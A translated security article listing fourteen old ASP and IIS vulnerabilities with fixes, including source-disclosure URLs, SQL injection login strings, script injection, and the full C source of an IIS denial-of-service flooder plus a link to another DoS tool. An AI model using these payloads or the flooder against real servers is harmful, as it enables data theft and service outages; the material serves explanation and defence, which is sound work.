ASP vulnerability analysis and solution

xiaoxiao2021-03-06  82

1. Appending a special symbol to an ASP URL reveals the ASP source

Affected versions: Win95 PWS and IIS 3.0. Win98 PWS4 does not have this vulnerability, and neither does IIS 4.0 or later.

Problem description: the special symbols are a trailing period, %81 and ::$DATA. For example:

http://someurl/somepage.asp.
http://someurl/somepage.asp%81
http://someurl/somepage.asp::$DATA
http://someurl/somepage.asp%2E
http://someurl/somepage%2E%41sp
http://someurl/somepage%2E%Asp
http://someurl/somepage.asp%2E
http://someurl/msadc/samples/selector/showcode.asp?source=/msadc/samples/../../../../../../...IT.INI (returns that file's contents)

On a server running IIS 3.0 or Win95 PWS, any of these requests easily shows the source of somepage.asp instead of its output. Why does this terrible hole exist? The root cause lies in the peculiar behaviour of the Windows NT file system. As everyone knows, NT provides a file system completely different from FAT: NTFS. This "New Technology File System" gives NT a strong security mechanism, but it has also produced a number of hazards. Not everyone knows that NTFS supports multiple data streams inside one file, and that the main stream, the one holding all of the file's content, is named "$DATA". That is what makes it possible to access this NTFS feature directly from the browser and capture the script inside the file. The ::$DATA problem is therefore a problem in IIS: when it parses the file name it does not canonicalize it.

Solution and recommendation: Windows NT users should install IIS 4.0 or IIS 5.0; Windows 2000 is not affected. Win95 users should install Win98 and PWS 4.0.

2. Access .mdb database files can be downloaded

Description: when you use Access as the back-end database, anyone who knows or guesses the path and file name of the database on the server can download the Access database file. This is very dangerous. For example, if your Access database book.mdb is placed in the Database directory under the virtual directory, someone only needs to enter in the browser:

http://someurl/Database/book.mdb

If book.mdb was not encrypted beforehand, all the important data in book.mdb is now in their hands.

Workaround:
(1) Give the database file a complex, unconventional name and put it several directories deep. "Unconventional" means: if the database stores information about books, do not call it book.mdb; give it an odd name such as D34ksfslf.mdb and put it under a path such as ./kdslf/i44/studi/. A hacker who wants to obtain your Access database by guessing then has a hard time.
(2) Do not write the database name into the program. Some people like to write the DSN directly in the program, such as:

dbpath = Server.MapPath("cmddb.mdb")
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & dbpath

If someone obtains the source, the name of your Access database is exposed with it. I suggest you set up a data source in ODBC and write in the program: conn.Open "shujiyuan"
(3) Use Access to encode and encrypt the database file. First choose Tools -> Security -> Encrypt/Decrypt Database, select the database (for example employer.mdb) and confirm; in the "Save encrypted database as" window, save it as employer1.mdb. employer.mdb is then encoded into employer1.mdb. Note that this step does not set a password on the database; it only encodes the database file, so that others cannot read its contents with another tool.

Next, encrypt the database: open the encoded employer1.mdb in Exclusive mode, then choose Tools -> Security -> Set Database Password from the menu and enter a password. Once employer1.mdb has a password, Access asks for the password whenever the file is used and only opens the database when it is correct. To use the file from an ASP program, add the PWD parameter in the Open method, for example:

param = "driver={Microsoft Access Driver (*.mdb)};pwd=yfdsfs"
param = param & ";dbq=" & Server.MapPath("employer1.mdb")
conn.Open param

This way, even if someone gets hold of employer1.mdb, they cannot see its contents without the password.

3. code.asp leaks ASP source

Description: a simple example. The ASP 1.0 samples shipped by Microsoft contain an .asp file made specifically for viewing the source of other .asp files, at ASPSamp/Samples/code.asp. If someone uploads this program to the server, they can easily view other people's programs, for example: code.asp?source=/directory/file.asp. This is a rather old vulnerability, and I believe it is rare now. The following one is newer:

http://someurl/iissamples/exair/howitworks/code.asp?/lunwen/soushuo.asp=xxx.asp

The biggest harm is that .asa files can be read this way, so the database password is exposed to a hacker in plain form.

Solution or recommendation: delete the "Show ASP Code" sample of IIS, or disable access to that directory.

4. The FileSystemObject component can tamper with and download any file on a FAT partition

Description: under IIS3 and IIS4, ASP file operations are implemented through FileSystemObject, including reading and writing text files, directory operations and copying files. This powerful feature also leaves a very dangerous back door: FileSystemObject can be used to tamper with any file on a FAT partition. Even on an NTFS partition, if the permissions are not set it can do the same damage, and you may suffer a catastrophe. Unfortunately, many webmasters only know how to keep the web server running and rarely set permissions, and the NT default directory permissions are frighteningly low. So if you are a webmaster, pay close attention to the server settings: put the web directory on an NTFS partition, and do not grant Everyone Full Control. Even members of the Administrators group generally do not need it; Read and Change permissions are enough. You can also delete or rename the FileSystemObject component.

5. Entering standard HTML or JavaScript statements in an input box changes the output

Description: what happens when standard HTML is entered in an input box? In a guestbook, for example, we post a message such as "Hello!" enclosed in an HTML tag that enlarges the font. If your ASP program does not filter HTML statements, the font size of "Hello" changes. Changing the font size or inserting an image in a message is sometimes not a bad thing; it can make the message livelier. But if a JavaScript loop is written into the input box, for example a link labelled "Extraordinary News" with an endless loop in its mouse-over handler, then when another visitor viewing the message moves the mouse over "Extraordinary News", their browser hangs in the infinite loop.

Solution and recommendation: write a routine that prevents this, for example one that checks the client's input and filters out all HTML and JavaScript statements.

6. ASP password-verification vulnerability

Description: many sites store passwords in a database and use SQL like the following for login verification (as an example):

SQL = "SELECT * FROM user WHERE username='" & username & "' AND pass='" & pass & "'"

With this, you can construct a special username and password according to the SQL, such as Ben' or '1'='1, and enter pages you have no privilege for. Look at the statement above: when that username is substituted, the program's statement becomes:

SELECT * FROM user WHERE username='Ben' or '1'='1' AND pass='...'

OR is a logical operator joining two conditions: as long as one of them holds, the whole expression holds. In the language, 1 is true. So in this statement the "AND" check of the original statement no longer matters, because "1=1" combined with "OR" makes the condition return true.

We can also construct the following username and password:

username = 'aa' or username<>'aa'
pass = 'aa' or pass<>'aa'

In the browser, write in the user name box: aa' or username<>'aa and in the password box: aa' or pass<>'aa. Note that neither string has a quote at its beginning or end. This also fools the system and gets in. Although the latter method works in theory, it is hard in practice, because two conditions must be met: 1. You must first know which two fields of the system's table store the user name and password; only then can the attack string be constructed precisely. In fact this is hard. 2. The system does not validate the string you entered.

Problem solution and recommendation: validate the input and handle the single quote character "'".
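The concatenated login query above beside a parameterized version, as an added example that is not from the article: it uses Python's sqlite3 module as a stand-in for the ADODB connection, and the user table with its two rows is constructed here. The quote check at the end is the article's minimal suggestion; the placeholders are the real fix.

```python
"""Vulnerable string-built login query beside a parameterized one."""
import sqlite3

# Constructed sample table; column names follow the article's query.
SAMPLE_USERS = [("admin", "s3cret"), ("Ben", "benpass")]


def setup_db():
    """In-memory stand-in for the Access database behind the login page."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (username TEXT, pass TEXT)")
    conn.executemany("INSERT INTO user VALUES (?, ?)", SAMPLE_USERS)
    return conn


def build_vulnerable_sql(username, password):
    """Same concatenation as the article's SQL = "... '" & username & "' and pass = '" & pass & "'"."""
    return ("SELECT * FROM user WHERE username = '" + username
            + "' AND pass = '" + password + "'")


def login_vulnerable(conn, username, password):
    """Number of rows matched; anything above 0 lets the login through."""
    return len(conn.execute(build_vulnerable_sql(username, password)).fetchall())


def login_parameterized(conn, username, password):
    """Placeholders send the values separately from the SQL text, so a quote
    in the input is compared as data and never changes the WHERE clause."""
    rows = conn.execute(
        "SELECT * FROM user WHERE username = ? AND pass = ?",
        (username, password),
    ).fetchall()
    return len(rows)


def quote_check(value):
    """The article's minimal mitigation: reject input containing a single quote."""
    return "'" not in value


if __name__ == "__main__":
    db = setup_db()
    payload = "Ben' or '1'='1"          # the article's example username
    print(build_vulnerable_sql(payload, "wrong"))
    print("vulnerable rows:", login_vulnerable(db, payload, "wrong"))
    print("parameterized rows:", login_parameterized(db, payload, "wrong"))
```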

7. IIS4 or IIS5 with the Index Server service installed leaks ASP source

Description: on IIS4 or IIS5 running Index Server, entering a specially formatted URL shows the source of an ASP program or other page. Even systems that already have the source-disclosure patch applied, or that have no .htw files at all, have the same problem. Obtaining the source of an ASP program, or even of global.asa, is undoubtedly a very serious security hazard: these files often contain user passwords and IDs, as well as the path and name of the database, which is very valuable to an attacker collecting information about the system. With a URL built as follows you can see the program source:

http://202.116.26.38/null.htw?CiWebhitsFile=/default.asp&CiHiliteType=full

This only returns the file in HTML format, but when a %20 is appended to the CiWebhitsFile parameter, as follows:

http://someurl/null.htw?CiWebhitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=full

the program's source code is returned. (Note: /default.asp is relative to the web root. For a page such as http://someurl/welcome/welcome.asp the request is http://someurl/null.htw?CiWebhitsFile=/welcome/welcome.asp%20&CiRestriction=none&CiHiliteType=full.) Since null.htw is not a real file on the system but a virtual file held in system memory, removing all real .htw files from the system does not help: requests for null.htw are handled by webhits.dll, so IIS remains exposed to this vulnerability.

Solution or recommendation: if the function provided by WebHits is something the system needs, download the appropriate patch. If it is not needed, use the IIS MMC management tool to simply remove the .htw mapping. Patches:

Index Server 2.0, Intel: http://www.microsoft.com/downloads/release.asp?ReleaseID=17727
Index Server 2.0, Alpha: http://www.microsoft.com/downloads/release.asp?ReleaseID=17728
Indexing Services for Windows 2000, Intel: http://www.microsoft.com/downloads/release.asp?ReleaseID=17726

8. Bypassing verification by entering the ASP page directly

Description: if a user knows the path and file name of an ASP page that is supposed to be protected by verification and enters that file name directly, the verification may be bypassed. For example, I tried this on some sites: first close all browser windows, then enter http://someurl/system_search.asp?page=1 and you see content only the system administrator should see. Of course, to prevent this some people add a check at the beginning of system_search.asp, such as testing whether Session("system_name") is non-empty, so that the URL above cannot directly enter the administrator page. But this method also has a hole: if the attacker first logs in with a legitimate account, or generates a session on the same machine, such as Session("system_name")="admi", then because Session("system_name") is not empty the password check is skipped and he goes straight into the administrator page.

Workaround: do the appropriate processing at the beginning of every ASP page that needs verification. For example, track the file name of the previous page, so that only a session coming from that previous page may read this page.

9. IIS 4.0/5.0 special-format URL remote DoS attack

Description: when an IIS 4.0 or IIS 5.0 web server receives a URL in a special data format, the attack slows down the web server's response and may make it stop temporarily. Affected versions: Microsoft Internet Information Server 4.0, Microsoft Internet Information Server 5.0. Test program: http://202.96.168.51/download/exploits/iisdos.exe; its source: http://202.96.168.51/download/exploits/iisdos.zip. Test procedure: run IISDOS <***.***.**.**> to attack the other party's web server.

Solution:
Internet Information Server 4.0: http://www.microsoft.com/downloads/release.asp?ReleaseID=20906
Internet Information Server 5.0: http://www.microsoft.com/downloads/release.asp?ReleaseID=20904
More information: http://www.microsoft.com/technet/security/bulletin/ms00-030.asp
Microsoft security bulletin MS00-021: http://www.microsoft.com/technet/security/bulletin/fq00-030.asp
Related links: http://www.ussrback.com

10. IIS web server DoS vulnerability

Description: by default IIS is easy to hit with a denial-of-service attack. If the registry value called "MaxClientRequestBuffer" has not been created, this attack usually works against the NT system. "MaxClientRequestBuffer" sets the size of input IIS will accept. If "MaxClientRequestBuffer" is set to 256 (bytes), an attacker who sends a huge string of characters to IIS is limited to 256 bytes. The system default imposes no such limit, so the following program easily mounts a DoS attack on IIS Server (cnghack.c, as reproduced on the page; the remainder of main() is cut off there):

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock.h>

#define MAX_THREAD 666

void cng(void);

char *server;
char *buffer;
int port;
int counter = 0;
int current_threads = 0;

int main(int argc, char **argv)
{
    WORD tequila;
    WSADATA data;
    int p;
    DWORD tid;
    HANDLE hthread[2000];

    /* This code is as lame and sucks as it is. Won't exit correctly and a lot
       of other fun things that I didn't want to take the time to do. So just
       Ctrl-C out of the code. Load up cnghack.exe 3 times for charm. */
    printf("CNG IIS DoS.\nmarc@eeye.com\n\"for my beloved.\"\n");
    if (argc < 3) {            /* both argv[1] and argv[2] are used below */
        printf("usage: %s [server] [port]\n", argv[0]);
        exit(1);
    }
    buffer = malloc(17500);
    memset(buffer, 'A', 17499); /* fill the buffer with A's and terminate it */
    buffer[17499] = '\0';
    server = argv[1];
    port = atoi(argv[2]);
    tequila = MAKEWORD(1, 1);
    printf("Attempting to start Winsock...");
    if (WSAStartup(tequila, &data) != 0) {
        printf("Failed to start Winsock.\n");
        exit(1);
    }
    counter = 0;
    /* for (p = 0; p ...  the rest of main(), the loop that starts the cng()
       threads (tid, hthread, MAX_THREAD), is cut off on the page */
    return 0;
}

void cng(void)
{
    int sockfd = 0, p;
    struct sockaddr_in dstsain;
    char getkilled[] = "GET / HTTP/\r\n";
    int die = 1;

    printf("Entered cng\n");
    current_threads++;
    dstsain.sin_family = AF_INET;
    dstsain.sin_port = htons((u_short)port);
    dstsain.sin_addr.s_addr = inet_addr(server);
    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        printf("Failed to create socket\n");
        --current_threads;
        return;
    }
    if (!connect(sockfd, (struct sockaddr *)&dstsain, sizeof(dstsain))) {
        p = send(sockfd, getkilled, strlen(getkilled), 0);
        printf("Step 1: %i\n", p);
        for (;;) {
            p = send(sockfd, buffer, strlen(buffer), 0);
            printf("p: %i\n", p);
            /* put in some code to check if send == -1 more than x times;
               then we drop the loop and exit the thread. blah blah blah */
        }
    }
    --current_threads;
    printf("Exited cng\n");
    return;
}

cnghack.c works by sending:

GET / HTTP/[return][buffer]

where [return] is just \r\n and [buffer] is a never-ending stream of A's. The result of the attack is that the NT system's CPU usage goes to 100%.

Solution: run Regedt32.exe and add a value under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\w3svc\parameters with Value Name: MaxClientRequestBuffer, Data Type: REG_DWORD, set to the decimal value of the maximum URL length you want IIS to accept. CNNS sets it to 256.

11. MS ODBC database connection overflow causes an NT/9x denial of service

Description: the Microsoft ODBC database (Microsoft Access database) may have a potential overflow problem when connecting and disconnecting. If a connection is not closed and a second connection is opened directly to the database, the service may stop. Affected systems: ODBC version 3.510.3711.0; ODBC Access driver version 3.51.1029.00; OS: Windows NT 4.0 Service Pack 5, IIS 4.0 (i386), Microsoft Office 97 Professional (mso97.dll: 8.0.0.3507).

Detection method: ODBC data source name: MiscDB; ODBC database type: MS Access; assumed path: D:\DATA\Misc.mdb. ASP code:

<%
Set connVB = Server.CreateObject("ADODB.Connection")
connVB.Open "driver={Microsoft Access Driver (*.mdb)};DSN=MiscDB"
%>
... lots of html removed ...
<%
Set connGlobal = Server.CreateObject("ADODB.Connection")
connGlobal.Open "DSN=MiscDB;User=sa"
mSQL = "arb SQL Statement"
Set rsGlobal = connGlobal.Execute(mSQL)
While Not rsGlobal.EOF
    Response.Write rsGlobal("resultfrommiscdb")
    rsGlobal.MoveNext
Wend
'Set rsGlobal = Nothing
'connGlobal.Close
'Set connGlobal = Nothing
'Note we do NOT close the connection
%>
<%
Set connGlobal = Server.CreateObject("ADODB.Connection")
connGlobal.Open "Driver={Microsoft Access Driver (*.mdb)};dbq=d:\data\misc.mdb"
mSQL = "arb SQL Statement"
Set rsGlobal = connGlobal.Execute(mSQL)
While Not rsGlobal.EOF
    Response.Write rsGlobal("resultfrommiscdb")
    rsGlobal.MoveNext
Wend
rsGlobal.Close
Set rsGlobal = Nothing
connGlobal.Close
Set connGlobal = Nothing
'Note we DO close the connection
%>

In this case the IIS worker process hangs and CPU usage reaches 100% because of the inetinfo.exe process. Only a reboot recovers the machine.

12. ASP home page .inc file leak

Description: affected versions: any system. Remote: yes / Local: yes. Summary: while an ASP site is being finished and debugged, some search engines may add it as an indexing target. If someone uses a search engine to find such pages, they get the location of the files, and the browser then reveals details of the database location and structure and the complete source code. The specific procedure is:
- Use a search engine to search for the keywords "Microsoft VBScript runtime error" and ".inc,".
- The search engine automatically finds the include files (.inc) used by the ASP pages and shows them to the user.
- Viewing the include file's source in the browser may reveal sensitive information.

Examples:
- http://shopping.altavista.com/inc/lib/prep.lib exposes the database connection and type, resource locations, cookie logic and the server IP address
- http://www.justshop.com/sflib/ship.inc exposes the database type
- http://www.bbclub.com:8013/includes/general.inc exposes co-branding
- http://www.salest.com/corporate/admin/include/Jobs.inc exposes the data file location and structure
- http://www.bjsbabes.com/sflib/design.inc exposes the database structure and source code of StoreFront 2000
- http://www.ffg.com/scripts/issearch.inc exposes the search engine's record file
- http://www.wcastl.com/include/functions.inc exposes member e-mail addresses
- http://www.wcastl.com/FLAT/Comments.txt exposes the members' private comment file
- http://www.traveler.net/two/cookies.inc exposes cookie logic

Solution:
- Search engines should not index pages with ASP runtime errors; a page should be thoroughly debugged before it goes online.
- Security experts need to fix ASP include files so that external users cannot see them. The ASP newsgroups and the site offer two solutions to this vulnerability. First, encrypt the contents of the .inc files. Second, use .asp files instead of .inc files, because an .inc file lets a user view the file's source directly in the browser. Also, do not give .inc files names that are system defaults or have a special meaning.

13. Using Active Server Explorer to read and write files

Description: CHINAASP's Active Server Explorer lets you view the name, size, type and modification time of files in a directory on the server online, edit text files such as .txt, .htm, .asp, .pl and .cgi online, and directly execute files on the server. Active Server Explorer takes a relative or absolute path, so if an attacker uploads it to a directory on the target server that supports ASP, he can modify and execute files on the target server through it. This situation arises when the attacker has an account with a writable directory on the target NT server and that directory supports ASP; for example, some free personal home page servers support ASP. The attacker uploads Active Server Explorer to his free home page space, then obtains a path on the target server by various methods (for instance the vulnerability "requesting a non-existent .idq or .ida file exposes the physical path of the file on the server"), or simply uses the relative path ".", which is usually the default. The attacker can then arbitrarily modify and execute files on the target server, whether or not he has read access to them. So servers that offer personal home pages or other services with ASP support are exposed to this kind of attack.

Solution: Active Server Explorer actually relies on vulnerability 4 above, the FileSystemObject component's ability to tamper with any file on a FAT partition. So how do we restrict users from using the FileSystemObject object? An extreme approach is to completely unregister the component that provides FileSystemObject, that is, scrrun.dll: at the MS-DOS prompt run REGSVR32 /U C:\Windows\system\scrrun.dll (change the path to match your machine). But then you cannot use FileSystemObject either, and it is very convenient for managing files, so is there a way to have it both ways? We can prevent others from illegally using the FileSystemObject object while still using it ourselves. The method is as follows: find the registry key HKEY_CLASSES_ROOT\Scripting.FileSystemObject and rename it (right-click -> Rename) to a string of your choosing, such as HKEY_CLASSES_ROOT\Scripting.FileSystemObject2. In ASP the object must then be referenced as Set fso = CreateObject("Scripting.FileSystemObject2"); the usual Set fso = CreateObject("Scripting.FileSystemObject") no longer works, so anyone calling FileSystemObject the normal way cannot use it. As long as you do not tell others the changed object name, they cannot use the FileSystemObject object.

In this way, as site managers we block illegal use of the FileSystemObject object while still being able to use it ourselves, which makes online site management easy.

14. IIS 4.0/IIS 5.0 long file name request vulnerability

Description: affected versions: Microsoft IIS 5.0 on Microsoft Windows 2000; Microsoft IIS 4.0 on Microsoft Windows NT 4.0; Microsoft BackOffice 4.0 on Microsoft Windows NT 4.0. When 230 "%20" sequences are appended to a known file name followed by .htr, Microsoft IIS 4.0/5.0 returns the contents of the file. This is caused by the ISM.dll mapping. For example: http://target/filename%20...(230 times)...%20.htr. The request only works the first time a .htr request is made, that is, the first time ism.dll is loaded into memory.

Solution: install the patch:
Microsoft IIS 5.0: http://download.microsoft.com/download/win2000platform/Patch/Q249599/NT5/EN-US/Q249599_W2K_SP1_X86_en.EXE
Microsoft IIS 4.0: http://download.microsoft.com/Download/IIS40/PATCH/Q260838/NT4ALPHA/EN-US/ISMPST4I.EXE
